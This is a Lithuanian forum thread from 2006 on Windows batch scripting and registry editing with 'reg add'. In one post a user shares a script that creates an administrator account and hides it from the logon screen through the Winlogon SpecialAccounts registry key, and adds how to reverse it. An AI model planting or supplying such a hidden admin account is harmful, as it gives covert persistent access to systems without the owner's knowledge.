Bat scriptinimas

.....
Žinutė
Autorius
Vartotojo avataras
GODhack
profesionalas
profesionalas
Pranešimai:4469
Užsiregistravo:2005 03 18 21:13
Susisiekti:

#16 Standartinė GODhack » 2006 08 14 19:43

Dar pirma reiktu pasiziuret
netstat /all
ir
NetBIOS over Tcpip. . . . . . . . :
eilute. Nes daugumoj sistemu siandien jau sviecia cia "disablet" ir ismata gaunas tada.
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
Paveikslėlis

Vartotojo avataras
mrg
garbės narys
garbės narys
Pranešimai:229
Užsiregistravo:2006 02 07 20:14

#17 Standartinė mrg » 2006 08 18 20:05

Naujas registro raktu kurimas.
Yra penkios pagrindines registro atsakos, tai
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_USERS
HKEY_CURRENT_CONFIG

Kad nereiktu kuriant nauja registro atsaka, rasineti ilgu pavadinimu yra sutrumpinimai

HKEY_LOCAL_MACHINE=HKLM
HKEY_CLASSES_ROOT=HKCR
HKEY_CURRENT_USER=HKCU
HKEY_USERS=HKU
HKEY_CURRENT_CONFIG=HKCC

sukurkime hklm\software direktorijoje aplankala myco

reg add hklm\software\myco

arba galima rasyti pilna direktorija iki failo

reg add hkey_local_machine\software\myco


norint sukurt "string" tipo reiksme su pavadinimu cool

reg add hkey_local_machine\software\myco /v cool

sukurkime reiksme su REG DWORD

reg add hkey_local_machine\software\myco /v gamalas /t REG_DWORD

Yra skirtingu tipu reiksmes registre, reikalinga panaudokite vietoj auksciau nurodyto "REG_DWORD"

REG_SZ
REG_MULTI_SZ
REG_DWORD_BIG_ENDIAN
REG_DWORD
REG_BINARY
REG_DWORD_LITTLE_ENDIAN
REG_LINK
REG_FULL_RESOURCE_DESCRIPTOR
REG_EXPAND_SZ


Syntakse
reg add rakto_nuoroda [/v aplanko_vardas|/ve] [/t registro_reiksme] [/s naudojamas_kartu_su_REG_MULTI_SZ_arba_itraukiami_daugiau_registro_reiksmiu] [/d registro_reiksmes_verte] [/f]

/f naudojama, kad nebutu isvedamas patvirtinimo langas

pavyzdys pabandymui:
reg add hkey_local_machine\software\myco /v aha /t REG_BINARY /d 12345 /f

Jei kas neaisku - klauskite. Jei yra netikslumu stengsiuos istaisyt.

Vartotojo avataras
GODhack
profesionalas
profesionalas
Pranešimai:4469
Užsiregistravo:2005 03 18 21:13
Susisiekti:

#18 Standartinė GODhack » 2006 08 18 20:13

DAR
Galima dirbt ir grafinej aplinkoj kuri ijungiama su regedit komanda. (i start -> run... arba i koncole).

Galima dirbt su notepadu ir kurt .reg formato skriptus. Ikona su zaliais kubiukiais.
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
Paveikslėlis

Vartotojo avataras
mrg
garbės narys
garbės narys
Pranešimai:229
Užsiregistravo:2006 02 07 20:14

#19 Standartinė mrg » 2006 08 18 20:36

Taip tu teisus, reikejo paminet, bet kaip visuomet Godhack operatyvus. :D

Vartotojo avataras
GODhack
profesionalas
profesionalas
Pranešimai:4469
Užsiregistravo:2005 03 18 21:13
Susisiekti:

#20 Standartinė GODhack » 2006 08 18 20:46

Cia as tau "hintus" numeciau, kad nenustotum rasyt tokiu idomiu ir manu daug kam naudingu dalyku.
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
Paveikslėlis

Vartotojo avataras
mrg
garbės narys
garbės narys
Pranešimai:229
Užsiregistravo:2006 02 07 20:14

#21 Standartinė mrg » 2006 08 27 15:01

Sukursiu skripta, kuris sukurs vartotoja root teisemis ir bus pasleptas nuo valdymo pulto akiu.

@echo off
echo sukurkime vartotojas, kurio prisijungimo vardas "vartotojas" prisijungimo slaptazodis "slaptazodis"
net user /add vartotojas slaptazodis
echo priskirkime ji administratoriu grupei
net localgroup /add Administrators vartotojas
echo paslepkime ji nuo valdymo pulto akiu
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v vartotojas /t REG_DWORD /d 0 /f
echo

priesnuodis:
arba keiciame registro rakto reiksme i 1

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v vartotojas /t REG_DWORD /d 1 /f

arba triname visa registro rakta

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v vartotojas /f

tada nueje i "control panel/User Accounts" galesite istrint vartotoja.

Manau rasit kur ji galesit pritakyt saviems tikslams. :)
Atkreipkite demesi, kad skripta suskaido i kelias dalis. Is viso eiluciu buvo astuonios (neiskaiciuojant prisnuodzio).
P.S Jei bus paklausa, bus ir pasiula :)

Xgreem
ultra dalyvis
ultra dalyvis
Pranešimai:522
Užsiregistravo:2006 02 25 20:00

#22 Standartinė Xgreem » 2006 08 28 14:49

Saunuolis.
linux + nessus + nmap + exploit +enter = all doors open

Skelbti atsakymą

Grįžti į

Dabar prisijungę

Vartotojai naršantys šį forumą: 2 ir 0 svečių